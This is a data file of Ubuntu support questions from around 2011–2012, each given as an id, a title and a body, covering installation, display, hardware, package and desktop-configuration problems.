94034	how do i open youtube content in an app instead of my browser , while clicking on a link ?	now when i follow a link in my browser to youtube , it opens in a new page of my browser , in my case firefox . i would have liked that it provokes the launch of another app , for example minitube , vlc or totem . this app should then run the desired video . this feature exists already on android , where youtube videos can be opened in the youtube app or in your browser , and this association can be set as you want . i suppose i could extend this question to other video platforms like dailymotion , or to other contents , like streaming media , but i will leave it for another question .
94035	how do i turn `` sudo apt-get '' text into clickable download links in firefox ?	in support forums , tech blogs or any other website , one may encounter some instruction similar to the following : type sudo apt-get install sl in a terminal window , enter your password en you should get your program . i know the risk implied by installing additional software and i promise i will be careful . so how do i make firefox understand that whenever it displays such a text , it should turn it into a link wich , when cliked on , will open the software center on the right page ?
94040	how can i keep my wubi installation after formatting windows ?	well i need to format my windows 7 pc with a wubi installation . is there a way i can backup the virtual hard drive files , then format my pc , install wubi and put the hard drive files back ?
94045	how to secure ubuntu server	is there any complete ubuntu server hardening document which will suffice iso 27001 or pci dss or any other security standard .
94046	installed ubuntu via wubi , only reading 2.9 gib of ram	so i just installed ubuntu 10.10 via wubi over win xp pro 32bit , my processor is x64 , and i have 4gb of ram installed , the ubuntu installs as 64bit but it only shows 2.9 gib of ram even tho the os is 64bit , why is this ? the whole reason i did this was because with windows xp you can not use a 32bit license for 64bit version , unlike vista/7 which works as long as version is same ( pro ultim etc ) and i need 64bit , but its only reading 2.9 : s ? my os is linux ubuntu 3.0.0-12-generic # 20-ubuntu smp fri oct 7 14:56:25 utc 2011 x86_64 x86_64 x86_64 gnu/linux .
94047	where should i report a bug and apply the fix ?	i 've identified a bug in xsane and have a four-line fix for it . i 'm a little confused as to where i should go to have this fix incorporated ... should i submit a bug report to ubuntu , debian , xsane , or all three ?
94048	how do i change gwibber themes or column settings ?	after setting up my accounts with gwibber , there is only one column showing all messages from each account . there are no controls or options to add columns , or to change what is seen in the single visible column ( except to switch to replies or private messages ) . it is also impossible to change themes â the `` preferences '' dialog has only `` options '' and `` messages '' . this was all configurable in previous versions , so how do i configure gwibber now ? this is on ubuntu 11.10 with : unity 4.24.0-0ubuntu2.1 libgtk-3-0 3.2.0-0ubuntu3 gwibber 3.2.1-0ubuntu1.3 i am also using the zukitwo hybrid ( blue ) theme , installed manually and activated via the gnome-tweak-tool .
94053	`` fails to get size of gamma '' error when trying to set resolution	on 11.10 my max allowed resolution is 1024x768 , while my monitor supports 1280x800 on windows . i 've seen a method to solve this via xrandr , but i allways get a message saying it fails to get size of gamma . xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 1024 x 768 , maximum 1024 x 768 default connected 1024x768+0+0 0mm x 0mm 1024x768 61.0* 800x600 61.0 640x480 60.0 is there any other way to add 1280x800 resolution to my laptop , any workarounds this ? thanks in advance .
94054	how do i set a click action on zenity -- notification ?	running echo `` message : hi '' | zenity -- notification -- listen i can click the bubble and it disappears . the zenity program keeps running until i ctrl-c. is there a way to `` catch '' the click and make some program run if the bubble is clicked before it goes away ?
94058	ca n't volume or brightness levels be remembered ?	i 'm on ubuntu 11.10 with gnome shell . if i change volume or brightness levels , they wo n't be remembered within the next login . is this normal ?
94060	run adduser non-interactively	i 'd like to use the adduser command to add a user ( with disabled password ) via a shell script . by default , adduser prompts you for various values ( e.g. , full name ) . is there any way to submit these values via command line ? or will i need to useradd instead ?
94061	how to install multiple ppas and applications at once ?	i 'm going to set up a couple of general use computers on one of my lab 's work benches . there 's a whole bunch of ppa repositories and applications from the ubuntu repositories that i 'd like to install after an initial ubuntu installation . is it possible to write up a script that will install all those apps and ppas in one go , requiring me only to double click the executable script and type in the admin password ? i imagine it would be fairly straight forward . could someone point me to a quick tutorial or perhaps even provide a template script of some sort so i can add in the ppa names and apt-get install packages ? thanks .
94062	triple head nvidia and intel	i have a dell inspiron with an intel integrated video and an nvidia video card . actually i have a dual head 2 x 27 samsungs monitors and i got an old 24 inch sitting there by himself crying to be plugged . i would like to know if it 's possible to do have a triple head with my computer and if so , how can i do it ?
94063	customize ubuntu control center and add web and text interface	i am working on my own ehmmm ... sorry my company own live distribution based on ubuntu . i would like to write something like control center with text , gui and web interface accessed by admin only : text interface - allows doing administrative tasks quickly even if normal session fails ( bad video settings or something ) . additionally there can be option to delete home-rw and live-rw settings and other low level tasks which could n't be run in normal ( gui ) session . started with grub entry option : init=/my_script.py normal gui - something like control center but customized/extended with my modules web - allows administrator to change the same computer settings via web browser ( from another computer ) + some stats , summary , info about this computer . in the previous version i 've used pyramid framework ... and it would be nice if it could be accessible from mobile devices . i thought about an pluginable system so it would be easy to add new functionality or change existing . on the 'bottom ' there should be one ( ? ) configurable script to do all the configuration tasks . for example to change net interface type : ./config networking change -- intf=eth0 -- type=auto do somebody have any idea how to do this with minimal efforts , without reinventing the wheel ( using existing programs/scripts/libraries ) ? ? ? all ideas , opinions , advice and critics are welcome : )
94064	boot process idles for 60s doing nothing	my ( pretty new ) computer boots very slow ; i see the purple empty screen for more than a minute until the ubuntu logo appears . dmesg shows a gap of 60 seconds in which nothing seems to happen ( no cpu load or iowait ) . i suspect is has something to do with udev or udevadm , since disk utilization spikes when they exit . i already unplugged everything i could ( second harddrive , all usb devices ) , but that did n't help . setting udev logging to `` debug '' in /etc/udev/udev.conf gave me some logs , but without timing information . what can i do to debug this further ? dmesg : http : //tmp.cweiske.de/dmesg-2012-01-09_1442 bootchart : http : //tmp.cweiske.de/sybo-oneiric-20120109-7.png similar issues : slow boot after clean install of natty
94065	can`t connect to an ubuntu 11.10 wi-fi hotspot	i 've googled much and finally managed to create a hotspot on ubuntu 11.10 to use it as a router . but there 's another problem - my phone ( samsung galaxy gio , running android 2.3.3 ) ca n't see it .
94068	in which countries would ubuntu tv be made available ?	will ubuntu tv be made available outside of uk/usa when it is released for public use ? for example in germany ?
94072	how to install new bootsplash image in xubuntu ?	i tried configuring it by installing 'super boot manager ' and it applies correctly without giving any error messages but when i reboot the router , i still see blank screen and not bootsplash . please help .
94081	how to setup a https proxy	the ubuntu 11.10 has only simple proxy configuration . where is the authentication option ? is there any https proxy connector apps in ubuntu ? i bought an https proxy ( it requires user name and pass and uses port 808 ) i used proxifier in windows and mac to connect to it . i realy need this . i need an app for that in ubuntu.i searched alot in google but no luck ! any suggestions
94084	connecting to 3g modem with command line	i have a 3g modem and it 's my only way to connect to internet . in the gui mode it 's easy to connect via network manager , but how to connect to internet with this modem in the text mode ? thanks in advance .
94085	how to enable vga switcheroo on an asus u41s ?	i have asus u41s notebook with 2 wideocards , intel hd graphics 3000 and geforce gt540m . i want to turn off the gf videocard , and work only with intel . on the internet i found out how to do this with vga_switcheroo : lspci | grep vga to see what number have my videocards cat /sys/kernel/debug/vgaswitcheroo/switch to see what for videocard is active but terminal says that it ca n't find locations of /vgaswitcheroo/switch . what must i do ?
94087	partition scheme	i bought a new laptop with following configuration : 640gb hard disk and 4gb ram with pre installed windows 7. right now the hard disk partition is dynamic in nature . now i want to multi boot my system with windows 7 and ubuntu , may be a third os in future . so kindly please suggest me the appropriate partition scheme along with the file system which can work efficiently . roughly i want 3 primary and 1 extended partitions.i am not able to decide about the sizes of each.i need to share my data with both the operating systems.kindly mention in detail about the partition scheme ? thanks in advance
94089	how do i install ubuntu tv on my computer ?	i have a media pc connected to my tv at home . how do i install ubuntu tv on this pc ?
94095	how to select from which source a software must be installed ?	here is my problem : i 'm using lucid lynx and would like to have the latest version of freeciv . the latest version i can get without adding a ppa is 2.1.10-1 , it is in one of the default sources ( do n't know which , universe or multiverse probably ) . the current version is 2.3 or something . i followed instructions on how to get up to date versions by adding ppa : kgoetz/ppa to the list of the sources . no problem here . after reloading the sources , the version i can install is still the 2.1.10-1 , the one from official sources . from the synaptic package manager , i could `` force the version '' , but the item is disabled in the menu . my question is : is there a way to override or select a particular source when installing a software ? this question is , of course , not limited to my particular case but to a global use of software sources .
94096	i have lost partition table for my usb flash drive	i working on ubuntu 11.10 i have used gparted for formatting my pendrive ( 2 gb ) but unfortunately i have lost the partition table for it . i unable create it using gparted . how do i create a new partition table ?
94101	programs icons of winehq	just installed office 2010 in my ubuntu x64 and run smooth but now i have an stetic issue dash and synapse can find the office applications : ) but all the office apps are shown with the wine icon . i change it manually with an icon pack at the wine folder but still with wine icons . so any idea to do this ? ?
94102	what is the difference between apt-get update and upgrade ?	what is the difference between apt-get update and apt-get upgrade ? which should i run first ? do any of them automatically run the other ?
94105	can i remove the buttons ( min , max , close ) from the unity panel and put them back on the window ?	in unity 2d , the buttons on a maximized window are by default placed above the launcher on autohide . tbh i hate it when stuff autohides , and was wondering if they can be moved ( on a maximized window , minimized no problems ) to the right side , under the me menu . possible ? i have the dash on always visible . the only program that does n't give me this problem is chrome , because when i deselect `` use system title and bars '' it puts the buttons right there under the me menu . ca n't this be done for all programs ?
94107	how to combine features of different input methods ?	i want to have two different features concerning input methods . first , i want to have custom compose key combinations . i use ~/.xcompose , but in order to make it work i had to change default input method to xinput ( i added export gtk_im_module= '' xim '' to ~/.profile to achieve this ) . second , i want to get unicode chars through entering codepoints . it is possible with ctrl + shift + u ( see the end of this article ) . unfortunately it seems to be not working with xim imput method . any suggestions on how to get these two features simultaneously ?
94109	sun-java6-plugin installed but does not work in maverick 10.10	i would like to use the proprietary java browser plugin instead of icedtea in ubuntu maverick 10.10 . so i have removed icedtea6-plugin and installed sun-java6-plugin but neither firefox nor chromium show this in about : plugins nor can open java web apps . any idea how to fix it ?
94114	files on external memory are not uploaded , why ?	i have many files on an external iomega hdd 1tera , but they are not uploaded so i need to copy them on the u1 folder on the pc to get them uploaded . any help , please ?
94116	why computer dosent shut down , reboot or log out when i start libre office quick starter	why computer dosent shut down , reboot or log out when i start libre office quick starter ? and when libre office quick starter is working can i logout or shut down computer ?
94119	install mysql 5.6 from rpm	on my ubuntu 11.10 ( 64bit ) i has installed mysql server 5.1 which installs automatically , from synaptic . for some reason i find that i need upgrade to version 5.6 but i ca n't find .deb file for do that . so , i download few .rpm files from oracle which sholuld be that version . files are : mysql-client-5.6.4_m7-1.linux2.6.x86_64.rpm mysql-devel-5.6.4_m7-1.linux2.6.x86_64.rpm mysql-embedded-5.6.4_m7-1.linux2.6.x86_64.rpm mysql-server-5.6.4_m7-1.linux2.6.x86_64.rpm mysql-shared-5.6.4_m7-1.linux2.6.x86_64.rpm mysql-test-5.6.4_m7-1.linux2.6.x86_64.rpm those files are on my desktop . i tried to install but inpropper so now my old mysql also dont work : ) i would like to get step by step help for dummies : ) to properly install/reinstall those new packages and get mysql to work again if someone want to help . thanks .
94120	servers running from chrooted ubuntu on hp touchpad ?	the problem : servers appear to be broken inside my ubuntu chroot . no matter what kind of server i try to run , they all seem unresponsive ( vlc server wo n't respond to client , mkremote does n't move the cursor , apache gives an error about binding to port 80 and wo n't start , etc. ) . if i 'm not mistaken , what should normally happen inside a chroot is that all ports are shared between the chroot and the host , so if another machine tries to hit the host at port 80 , it will still see the chrooted web server . however , here , that is n't what 's happening . when i run netstat from the chroot , every single process lists a foreign address of 0.0.0.0 : * , meaning that the only machine which can act as a client is the local host . this is clearly incorrect and abnormal behaviour , as any process on my primary machine meant to be publicly visible lists a foreign address of : : : * ( which i assume means that any client can see it from any port ) . edit : disregard that ; apparently the foreign address only distinguishes between whether it 's listening for ipv4 or ipv6 connections , so it does n't seem relevant here . so far , googling has returned nothing of value , and i 'm basically stumped . any ideas ? could it just be some setting which one of the chroot patch devs enabled by default , or does it seem like a more complicated issue ? thanks . more context : http : //rootzwiki.com/topic/14682-webos-servers-inside-chrooted-ubuntu/
94128	hp pavilion g6 laptop backlight turns off at login screen	i 've seen posts like these but they all seem to mention the inability to get the brightness back up . i can turn the brightness back up with my keyboard , but it 's an annoyance that i 'd like to get rid of if at all possible .
94129	security and privacy measures	whats the most bomb proof security to protect h\d and data on it of all the programmes\options available . thank you all for what appears to be a debate . i am actually looking for a way to protect my data on my fixed h\d as far as a hardware option is concerned nothing is much better than a micro sd really.. you can simply eat it : - ) . however seriously i would be interested in a simple economic means to hide or make inaccessible certain directories and was wondering which was the best means to do this or at least make life difficult for who was trying to see the data . thanks
94130	css showing up in eclipse pdt tooltips	i am still mostly a novice in ubuntu and have never used eclipse until today . i downloaded the zend pdt eclipse ide and everything seems to be working pretty well , apart from the tooltips . ( see image below ) . it would appear that some css is appearing before the tooltip text and hitting tab does not complete the code , as i suspect it is meant to do . i have looked all over for a solution but all i can find are posts regarding the tooltips being black , not the case here . any ideas ? when i tried to run from the command line , i got this error : ( eclipse:8920 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , i am running ubuntu 11.10 64 bit .
94131	how to reset deja dup login credentials for remote location ?	i configured deja dup to perform backups to my remote ftp server and had it remember the credentials to log in so that it could continue these automatically . how do i edit/update the credentials it has stored , or have it erase them ? ( running oneric 11.10 w/ unity )
94132	is the genius slimstar 8000 compatible with ubuntu ?	the genius slimstar 8000 has caught my eye for use with my new htpc . however , i ca n't get an answer out of google if it works with ubuntu ( or linux for that matter ) . the reviews over at amazon indicate that it works with mac , so that is a good sign . has anyone tried this keyboard successfully ? failing that , where else can i look ? i really just want basic keyboard functionality , multimedia keys are a nice to have .
94134	virtualbox seems to disable printing in ubuntu to usb printer	i am running maverick on my machine and i have lexmark x6675 connected to the system via usb . i also have virtualbox 4.1 running windows vista on the system . and i have a very interesting situation with printing . if i have virtualbox running with usb device that is my printer enabled to virtualbox i am unable to print from ubuntu . i have to shutdown virtualbox ( i have n't tested but disabling the usb access probably does the same , i 'll have to check ) and then i can print from ubuntu . is this normal behavior ? is there a way to configure either virtualbox or ubuntu or both so that they can gracefully share the printer ?
94135	new system runs way slow.. what to look for ?	i have a new ubuntu installation ( 11.10 ) on an older machine ( intel p4 1.7g ) . system monitor shows cpu usage pegged most of the time , and in the 40-50 % range when the machine is idle . processes all seem to be sleeping most of the time , except gnome-system-monitor which is in the 10-20 % range most of the time . this machine did pretty well running xp . are there any tools i can use to find the culprit ( s ) ?
94137	is there a way to adjust contrast for simple scan ?	simple scan works very well for basic day to day scanning ; however , my scans are a bit washed out . am wondering if there 's way to adjust the contrast ?
94145	screen brightness out of control in samsung n210 after updates	after download of new updates in ubuntu 11.10 on a samsung n210 , the screen brightness goes crazy - it dims and brightens uncontrollably . what can i do about it ? have i any chance besides not allowing updates ?
94147	how do i make the scrollbars wider ?	i 'm using gnome 64-bit edition with the classic desktop and i do n't have overlay scrollbars installed . my question is , how can i make the scrollbars wider ? they 're too thin for me to hit as quickly or accurately as i 'd like . is there a setting i can change in the theme files or d/gconf somewhere ? thanks for your help !
94148	what is ubuntu tv ?	as the titles says , what is ubuntu tv and what are the main differences / advantages compared with any media center out there ?
94149	will ubuntu tv be offered in different desktop environments ?	will ubuntu tv run on all available desktop environments ? which environments will ubuntu tv run at ?
94150	how do i use openstack and keystone with juju ?	we are currently have a ( mostly ) working openstack infrastructure running ( just missing swift ) and would like to try using juju to deploy our applications to it . we just ca n't find documentation to help support us in that endeavor . we use keystone ( and horizon ) as our front end and it works . we 're not sure how the environments file should be built using the keystone username / password . we still have nova-objectstore running . we 're not ready to go to swift just yet . any help or guidance would be appreciated .
94152	switch from unity 2d to unity while logged in	it is possible to switch form unity2d to unity without logging out first ? i would like to be able to go back and fourth from the two while keeping some applications open . i realize this is just laziness , but i do n't want to have to keep opening the application ( s ) between each version of the de . i 've searched around the site here and i can not find a question or answer that touches on this ( the logged in part ) .
94155	run anacron even when on battery ( laptop )	there is a known behavior of anacron not to run when the laptop is running on batteries . is there any way to stop this behavior and run anacron whatever the power state ? http : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=152402 http : //www.mail-archive.com/debian-bugs-dist @ lists.debian.org/msg560900.html https : //bugs.launchpad.net/ubuntu/+source/anacron/+bug/36816
94156	installing with a different kernel	i want to install ( l ) ubuntu on a hard disk via an sata controller which is by default ( not yet ) supported by the standard ubuntu kernel ( ocz revodrive 3 x2 ) . however , i was able to patch the kernel and then access the hard disk that way . now i am stuck as i do not know how to get an ( l ) ubuntu boot cd with this patched kernel . ideas i had no success with until now : installing lubuntu on another hard disk and copying its root partition content to the new disk , then setting up a new bootloader - > system did not show any messages and did not boot running the ubiquity installer from within the ubuntu installation on another hard disk ( but with the patched kernel ) is there a way to generate a cd with a custom kernel ?
94162	netflix on 11.10	has anybody found a workaround to watch netflix on ubuntu other than running windows xp through virtualbox ? at this point my girlfriends fascination with netflix is the only reason i still use windows for anything . netflix now supports chrome os 13 or higher , and mac os 10.4.11 or later . i have tried moonlight without success .
94164	how to plot on log-type axis with libreoffice calc	i have some data and want to represent it on log type x-axis how to do that with lo calc ?
94165	can i keep burg on a triple boot with windows 7 and windows 8 ?	having installed windows 8 already on virtual machine , i thought i 'd like to see how it actually is , as virtual machine was a bit laggy . windows 8 can be installed like any other os , and it supports dual booting with windows 7 . however , it seems to use its own boot up manager , so if i install it , will i be able to boot ubuntu afterwards ? can i keep burg as my bootup loader ? ( referring to this lifehacker article on setting up a windows 7 / windows 8 dual-boot . ) thanks already beforehand !
94166	scp permission denied after warning : remote host identification has changed !	i was using scp and ssh suddenly some warning about something nast ! man-in-the-middle attack from that moment when that warning appeared till now , i can copy files via sftp but it is impossible to use scp . what 's going on ? i tried removing .ssh/known_hosts but it is always the same . when scp myfile user @ server : /folder , i get the following message . scp : /folder : permission denied
94171	random/invalid songs appearing on ipod touch music streaming app ?	when i first installed the app , it contained all music and sound effects from a game i 've never played , and none of mine . deleting the cache did n't fix it . i reinstalled it , and it seemed to work fine , except for some song titles ( i could listen to it , but it said 'unknown title ' ) , artists and albums missing . also , deleted songs stay for all eternity : i changed the tags and titles of some songs and deleted the old ones , but now they are duplicates ( the old ones give me an error though ) . deleting the cache had no effect . today , i found another song called `` bit remix '' , which was a chiptune cover of a popular anime 's ending theme . it was nice , but i had never heard it before . reloading the titles and deleting the cache did not fix it . why is it so buggy , and why do i see others ' music collections ?
94173	trackpad mouse jumping all over while typing	i am running ubuntu 11.10 64 bit on a dell inspiron 17r . things are working fairly well except for one major issue with the mouse . my palm hits the trackpad while i am typing and the mouse tends to have a mind of its own , scrolling the page and clicking all over . e '' disable touchpad while typing is selected . if i press random keys quickly and try to move the mouse , it appears to be disabled . however , at a regular typing speed , it goes haywire . any idea on how to fix this ?
94175	installing mods on minecraft 1.0 does not work for mo ' creatures	in attempting to get the mo ' creatures mod working on kubuntu 11.10 with openjre-6 i get the following error : # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007ff855ec9c08 , pid=4745 , tid=140704592516864 # # jre version : 6.0_23-b23 # java vm : openjdk 64-bit server vm ( 20.0-b11 mixed mode linux-amd64 compressed oops ) # derivative : icedtea6 1.11pre # distribution : ubuntu 11.10 , package 6b23~pre11-0ubuntu1.11.10 # problematic frame : # c [ libx11.so.6+0x35c08 ] xqueryextension+0x28 # # if you would like to submit a bug report , please include # instructions how to reproduce the bug and visit : # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ # as per the report 's suggestion , i was going to report the bug on launchpad , but figured i 'd ask here first . there are others experiencing this as well : mo ' creatures for minecraft refusing to work any ideas ? mojang recommends 64 bit java , which is what i 'm using . thanks in advance .
94176	installing ia32-libs on karmic koala	this server i 'm running is still on karmic - i 'm painfully aware that it has reached its end of life . however , due to a raid driver we 're using it 's a pretty big hassle to upgrade , something that i have n't yet had time to look into . i 'm trying to run a ventrilo server , and i 'm stuck because i ca n't install ia32-libs : $ sudo apt-get install ia32-libs reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32stdc++6 lib32v4l-0 lib32z1 libc6-i386 suggested packages : lib32asound2-plugins the following new packages will be installed : ia32-libs lib32asound2 lib32bz2-1.0 lib32gcc1 lib32ncurses5 lib32stdc++6 lib32v4l-0 lib32z1 libc6-i386 0 upgraded , 9 newly installed , 0 to remove and 4 not upgraded . need to get 33.8mb of archives . after this operation , 143mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! libc6-i386 lib32bz2-1.0 lib32gcc1 lib32z1 lib32stdc++6 lib32asound2 lib32ncurses5 lib32v4l-0 ia32-libs install these packages without verification [ y/n ] ? y err http : //us.archive.ubuntu.com karmic-updates/main libc6-i386 2.10.1-0ubuntu19 404 not found [ ip : 91.189.92.184 80 ] err http : //us.archive.ubuntu.com karmic/main lib32z1 1:1.2.3.3.dfsg-13ubuntu3 404 not found [ ip : 91.189.92.184 80 ] err http : //us.archive.ubuntu.com karmic-updates/main lib32asound2 1.0.20-3ubuntu6.1 404 not found [ ip : 91.189.92.184 80 ] err http : //us.archive.ubuntu.com karmic/main lib32ncurses5 5.7+20090803-2ubuntu2 404 not found [ ip : 91.189.92.184 80 ] err http : //us.archive.ubuntu.com karmic/main lib32v4l-0 0.6.0-1 404 not found [ ip : 91.189.92.184 80 ] err http : //security.ubuntu.com karmic-security/main libc6-i386 2.10.1-0ubuntu19 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com karmic-security/main lib32bz2-1.0 1.0.5-3ubuntu0.1 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com karmic-security/main lib32gcc1 1:4.4.1-4ubuntu9 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com karmic-security/main lib32stdc++6 4.4.1-4ubuntu9 404 not found [ ip : 91.189.92.166 80 ] err http : //security.ubuntu.com karmic-security/universe ia32-libs 2.7ubuntu17.1 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.10.1-0ubuntu19_amd64.deb 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/b/bzip2/lib32bz2-1.0_1.0.5-3ubuntu0.1_amd64.deb 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gcc-4.4/lib32gcc1_4.4.1-4ubuntu9_amd64.deb 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/z/zlib/lib32z1_1.2.3.3.dfsg-13ubuntu3_amd64.deb 404 not found [ ip : 91.189.92.184 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/g/gcc-4.4/lib32stdc++6_4.4.1-4ubuntu9_amd64.deb 404 not found [ ip : 91.189.92.166 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/a/alsa-lib/lib32asound2_1.0.20-3ubuntu6.1_amd64.deb 404 not found [ ip : 91.189.92.184 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/n/ncurses/lib32ncurses5_5.7+20090803-2ubuntu2_amd64.deb 404 not found [ ip : 91.189.92.184 80 ] failed to fetch http : //us.archive.ubuntu.com/ubuntu/pool/main/libv/libv4l/lib32v4l-0_0.6.0-1_amd64.deb 404 not found [ ip : 91.189.92.184 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/universe/i/ia32-libs/ia32-libs_2.7ubuntu17.1_amd64.deb 404 not found [ ip : 91.189.92.166 80 ] i 'm not too familiar with what happens to a system when it 's reached end of life , but i can see the security repos are gone . is there a way around this ? any help would be much appreciated !
94179	how do i get a wnda3100v2 wireless usb adapter working ?	ive found alot of things on the internet about this and ive tried all of them and none of them seem to work for me ... im new to ubuntu ... im trying to get my wnda3100v2 to work on my computer and i have been unsuccessful
94180	mounting partition on ubuntu 11.10 64-bit	i installed ubuntu 11.10 64-bit , but it could n't detect my partitions ( ntfs ) , there is just `` file system '' partition ( ubuntu partition ) in `` computer '' . what should i do now ? thanks .
94186	how can i restore all hidden subdirectories those were created during packages installation in case i completely wiped out my home directory	my /home directory was on the separate partition . by mistake i destroyed all the data on it . now it 's resized and formatted . it contains no directories but empty lost+found . so i lost config data for soo many packages and i guess some packages could not work , or could work wrong . am i right ? is there a way to restore those many hidden subdirectories that packages created during installation ? i suppose they 'll be recreated if i managed to reinstall all installed packages . ps server 10.04 lts , /etc/skel is empty
94187	how can i share a ubuntu folder with windows 7 across a wan ?	currently i have a ubuntu server located remotely and i would like to share a folder with my local windows 7 machine . in other words i would like to map my remote ubuntu drive as if it was a local drive . how would i go about doing this ?
94190	how can i make ubuntu look like debian 6.0 `` squeeze '' ?	i really like the simple look of debian 's interface . what desktop environment is it ? is it easy to replicate ?
94196	problem with 3 monitor configuration ( 2 monitors and a tv )	hello i 've been seraching a lot in the web about my problem but i have n't been able to find a solution . i have an ati radeon hd 6870 , i 'm using ubuntu 11.10 with unity and amd catalyst 11.12 , and i have 2 monitors samsung s20a300bs connected by the dvi port and a lg tv 32ld450 connected by the hdmi port . the thing is that i want to use the 2 monitors for working and use the tv to watch movies and tv shows , i have the 2 monitors working perfectly together but i ca n't use the 3 screens at the same time , i 've tried every possible configuration with amd ccc but it does n't let me use the tv ( i open it using sudo amdcccle on the terminal so it will give me the option of restart the pc and save changes but after rebooting nothing happens ) . first i tried to use the 3 screens with the `` multi-display desktop '' option . second i tried to use the 2 monitors with the `` multi-display desktop '' option and i use the `` single display desktop '' on the tv but what i got was a blank screen on the tv . third i used the 2 monitors with the `` multi-display desktop '' option and the `` cloned display from display ( s ) 1 '' on the tv because i do n't necessary have to use the monitors at the same time as the tv so that was an option , but it still did n't give anything on the tv after rebooting . all the times after rebooting i went to `` displays '' option in ubuntu and tried to configure the monitors and i got the same errors : the selected configuration for displays could not be applied *could not set the configuration for crtc 148* from all the configurations that i tried the only thing that varies is that give me the crtc 417 , crtc 148 , or the crtc 149 errors . one thing that i tried and worked 1 time in the displays option was to turn off the 2 monitors and turn on just the tv and only that time gave me signal on the tv ( but i ca n't do it anymore i do n't know why ) so anyone have any idea what can i do to configure my computer or where can i look for the problem ? ? ? because this is driven me crazy ! ! ! ! ! i was going to upload screenshots but i need 10 reputation jeje thanks in advance .
94199	disable wine integration	i installed winamp 5.6 under wine in ubuntu . now i have a winamp icon in the desktop , winamp menu entries under the wine menu in the `` application '' menu , but worse of all : in nautilus some files ( *.mp3 files ) are associated with winamp . this seems to be because ubuntu is trying to `` better integrate wine '' . here are some specs which all seem to be outdated : https : //wiki.ubuntu.com/betterintegratedwinespec https : //wiki.ubuntu.com/karmic-wine-integration https : //wiki.ubuntu.com/wineintegration https : //wiki.ubuntu.com/bestintegratedwine how can i disable this integration ? file associations should never be set outside of wine . menu entries should never be created outside of wine . icons should never be created outside of wine . basically what goes in wine should stay in wine . using ubuntu lucid .
94201	how do i install the cinnamon desktop ?	i have read that there is a new gnome-2 like interface called cinnamon produced by the linux mint developers . is this available for ubuntu users - and if so how do i install it ?
94205	add more functions in gedit	i 'm trying out ubuntu for the first time so i 'm a very new but i 've done a bit of searching and i want to get something pretty similar to notepad++ gedit so far seems to be the pretty similar except i like a feature in n++ where i can add more function names to a list so it knows to colour them a certain way . for example in my prepared statements ( php ) i use things such as prepare or execute but gedit does n't recognize these and just leaves them white . i 'm sure there must be a file somewhere which contains a list of all known function names and i 'd imagine you can edit it to add more , but i have no idea on where to start looking ? i ca n't find a plugin for it either so i guess this is the only way . either that or i install wine and use that to run n++ but a tutorial i found for that tells me to start typing in all sorts of things to install it and i have no idea where i being typing them ha . plus it kinda defeats the point of me having ubuntu if i 'm just gon na revert to a windows emulator all the time : p
94207	autostart app with proper icon in unity launcher	one can autostart an application such that it launches on session start with an xdg desktop file in ~/.config/autostart ( or /etc/xdg/autostart ) . but my application ( a python/gtk/webkit/html5 app ) when autostarted has a unity ( and a unity-2d ) launcher icon that is a gray question mark , even though : when i find it in dash , the dash shows the icon i specify in my main desktop file ( in /usr/share/applications ) when i launch it from dash , the launcher shows the icon i specify in my main desktop file when i add it as a favorite , the launcher shows the proper icon there are two cases where i get the gray question mark icon : autostart launch from terminal ( this use case is not essential though and does n't involve the desktop file anyway : but should/does ubuntu have an xdg desktop file interpreter ă la # ! /usr/bin/desktop or something ) so : what is needed such unity ( 3d/2d ) launcher panel shows the icon specified in an autostart desktop file ?
94211	failed to open home directory	thunar is returning an error when i try to open my home directory : failed to open directory `` matt '' . error stating file '/home/matt/.gvfs ' : transport endpoint is not connected . is there any way i can fix this without restarting ? this error seems to be triggered upon logging out and logging back in when when multiple users are logged in .
94213	why ca n't i run dual monitors in widescreen mode at the same time ?	i have a widescreen laptop , and a viewsonic widescreen monitor . for some reason , i can not have both of them running in widescreen mode at the same . in other words , if i have my laptop in widescreen , then i can not set my viewsonic in widescreen , and vice versa . that tells me that it is not the viewsonic , and it is not vga port in the back of my laptop that is the problem , tt has got to be a setting somewhere . any idea ? for my system specs , i am running ubuntu 11.10 x64 my video card is an ati technologies inc rv350 [ mobility radeon 9600 m10 ] . here is what happens when i try to setup both monitors . when i go to : system settings\display & set my laptop to 1280x800 ( 16:10 ) & set my view sonic to 1440x900 ( 16:10 ) , i do n't think i get an error ( where would i look ) , all i see is both screens get fuzzy & stay fuzzy for 30 seconds till the application reverts back to the previous settings .
94214	system went read only ... wo n't allow me to boot	i accidentally made my system read only . after a quick google search i know this can be fixed by remounting the drive using sudo mount `` `` . the problem is i already restarted my system thinking that would be some sort of noob fix ... i am currently on a live cd since my laptop wont boot at all . the problem is the live cd does not see my laptops hard drive . how can i mount whats not their ... i tried gparted but the program does not see a built in hard drive . if i trying reinstalling ubuntu ( which is not a problem since i back up everything ) it says i have no hard drive ? ! if it helps i am on a toshiba and i have what ubuntu recommends for partitions when you do n't customize them on install .
94215	how do i install oracle 11gr2 enterprise in ubuntu ?	i installed oracle 11gr2 enterprise edition in ubuntu 10.04 and 10.10 but i ca n't install it in ubuntu 11.10. can anyone tell me how to install it in step by step ?
